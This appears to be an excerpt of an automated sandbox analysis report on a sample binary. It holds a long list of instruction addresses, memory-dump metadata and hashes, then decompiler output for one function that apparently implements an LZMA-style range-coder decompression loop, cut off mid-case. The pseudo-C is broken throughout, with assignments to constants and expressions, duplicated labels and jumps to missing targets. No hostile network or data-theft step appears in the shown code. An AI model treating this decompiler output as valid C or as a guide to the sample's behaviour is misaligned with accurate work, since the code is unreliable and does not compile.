                                                                                                    0x004068e8
                                                                                                    0x004068e9
                                                                                                    0x004068ec
                                                                                                    0x004068c2
                                                                                                    0x004068c2
                                                                                                    0x004068ca
                                                                                                    0x004068cf
                                                                                                    0x004068d1
                                                                                                    0x004068d4
                                                                                                    0x004068d4
                                                                                                    0x004068ef
                                                                                                    0x004068f6
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x004068f8
                                                                                                    0x00000000
                                                                                                    0x00406594
                                                                                                    0x00406597
                                                                                                    0x004065cd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x004066fd
                                                                                                    0x00406700
                                                                                                    0x00406700
                                                                                                    0x00406703
                                                                                                    0x00406705
                                                                                                    0x0040698f
                                                                                                    0x00000000
                                                                                                    0x0040698f
                                                                                                    0x0040670b
                                                                                                    0x0040670e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406714
                                                                                                    0x00406718
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x0040671b
                                                                                                    0x00000000
                                                                                                    0x0040671b
                                                                                                    0x00406599
                                                                                                    0x0040659b
                                                                                                    0x0040659d
                                                                                                    0x0040659f
                                                                                                    0x004065a2
                                                                                                    0x004065a3
                                                                                                    0x004065a5
                                                                                                    0x004065a7
                                                                                                    0x004065aa
                                                                                                    0x004065ad
                                                                                                    0x004065c3
                                                                                                    0x004065c8
                                                                                                    0x00406600
                                                                                                    0x00406600
                                                                                                    0x00406604
                                                                                                    0x00406630
                                                                                                    0x00406632
                                                                                                    0x00406639
                                                                                                    0x0040663c
                                                                                                    0x0040663f
                                                                                                    0x0040663f
                                                                                                    0x00406644
                                                                                                    0x00406644
                                                                                                    0x00406646
                                                                                                    0x00406649
                                                                                                    0x00406650
                                                                                                    0x00406653
                                                                                                    0x00406680
                                                                                                    0x00406680
                                                                                                    0x00406683
                                                                                                    0x00406686
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x004066fa
                                                                                                    0x00000000
                                                                                                    0x004066fa
                                                                                                    0x00406688
                                                                                                    0x0040668e
                                                                                                    0x00406691
                                                                                                    0x00406694
                                                                                                    0x00406697
                                                                                                    0x0040669a
                                                                                                    0x0040669d
                                                                                                    0x004066a0
                                                                                                    0x004066a3
                                                                                                    0x004066a6
                                                                                                    0x004066a9
                                                                                                    0x004066c2
                                                                                                    0x004066c4
                                                                                                    0x004066c7
                                                                                                    0x004066c8
                                                                                                    0x004066cb
                                                                                                    0x004066cd
                                                                                                    0x004066d0
                                                                                                    0x004066d2
                                                                                                    0x004066d4
                                                                                                    0x004066d7
                                                                                                    0x004066d9
                                                                                                    0x004066dc
                                                                                                    0x004066e0
                                                                                                    0x004066e2
                                                                                                    0x004066e2
                                                                                                    0x004066e3
                                                                                                    0x004066e6
                                                                                                    0x004066e9
                                                                                                    0x004066ab
                                                                                                    0x004066ab
                                                                                                    0x004066b3
                                                                                                    0x004066b8
                                                                                                    0x004066ba
                                                                                                    0x004066bd
                                                                                                    0x004066bd
                                                                                                    0x004066ec
                                                                                                    0x004066f3
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x0040667d
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x00000000
                                                                                                    0x004066f5
                                                                                                    0x004066f3
                                                                                                    0x00406606
                                                                                                    0x00406609
                                                                                                    0x0040660b
                                                                                                    0x0040660e
                                                                                                    0x00406611
                                                                                                    0x00406614
                                                                                                    0x00406616
                                                                                                    0x00406619
                                                                                                    0x0040661c
                                                                                                    0x0040661c
                                                                                                    0x0040661f
                                                                                                    0x0040661f
                                                                                                    0x00406622
                                                                                                    0x00406629
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x004065fd
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00000000
                                                                                                    0x0040662b
                                                                                                    0x00406629
                                                                                                    0x004065af
                                                                                                    0x004065b2
                                                                                                    0x004065b4
                                                                                                    0x004065b7
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406316
                                                                                                    0x00406316
                                                                                                    0x0040631a
                                                                                                    0x0040695f
                                                                                                    0x00000000
                                                                                                    0x0040695f
                                                                                                    0x00406320
                                                                                                    0x00406323
                                                                                                    0x00406326
                                                                                                    0x00406329
                                                                                                    0x0040632c
                                                                                                    0x0040632f
                                                                                                    0x00406332
                                                                                                    0x00406334
                                                                                                    0x00406337
                                                                                                    0x0040633a
                                                                                                    0x0040633d
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x0040633f
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004064a1
                                                                                                    0x004064a1
                                                                                                    0x004064a5
                                                                                                    0x0040696b
                                                                                                    0x00000000
                                                                                                    0x0040696b
                                                                                                    0x004064ab
                                                                                                    0x004064ae
                                                                                                    0x004064b1
                                                                                                    0x004064b4
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b6
                                                                                                    0x004064b9
                                                                                                    0x004064bc
                                                                                                    0x004064bf
                                                                                                    0x004064c2
                                                                                                    0x004064c5
                                                                                                    0x004064c8
                                                                                                    0x004064c9
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064cb
                                                                                                    0x004064ce
                                                                                                    0x004064d1
                                                                                                    0x004064d4
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064d7
                                                                                                    0x004064da
                                                                                                    0x004064dc
                                                                                                    0x004064dc
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x0040671e
                                                                                                    0x00406722
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00406728
                                                                                                    0x0040672b
                                                                                                    0x0040672e
                                                                                                    0x00406731
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406733
                                                                                                    0x00406736
                                                                                                    0x00406739
                                                                                                    0x0040673c
                                                                                                    0x0040673f
                                                                                                    0x00406742
                                                                                                    0x00406745
                                                                                                    0x00406746
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x00406748
                                                                                                    0x0040674b
                                                                                                    0x0040674e
                                                                                                    0x00406751
                                                                                                    0x00406754
                                                                                                    0x00406757
                                                                                                    0x0040675b
                                                                                                    0x0040675d
                                                                                                    0x00406760
                                                                                                    0x00000000
                                                                                                    0x00406762
                                                                                                    0x004064df
                                                                                                    0x004064df
                                                                                                    0x00000000
                                                                                                    0x004064df
                                                                                                    0x00406760
                                                                                                    0x00406995
                                                                                                    0x004069b7
                                                                                                    0x004069bd
                                                                                                    0x004069bf
                                                                                                    0x004069c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405fc4
                                                                                                    0x004069cc
                                                                                                    0x004069cc
                                                                                                    0x00000000

                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                    • Instruction ID: 3ccfc7c80e99de65fa6db0e0edc8679980b1d0ea62cd2807200041591328ae3c
                                                                                                    • Opcode Fuzzy Hash: c94337aa44be19872a05e7fe324c1f72408cb83bc4afcb37e89916e28dd5cdb7
                                                                                                    • Instruction Fuzzy Hash: D98187B1D00229CBDF24CFA8C8447AEBBB1FB44305F11816AD856BB2C1C7785A96CF44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004063D0, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 98%
                                                                                                    			E004063D0() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M004069D4))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600);
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40));
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
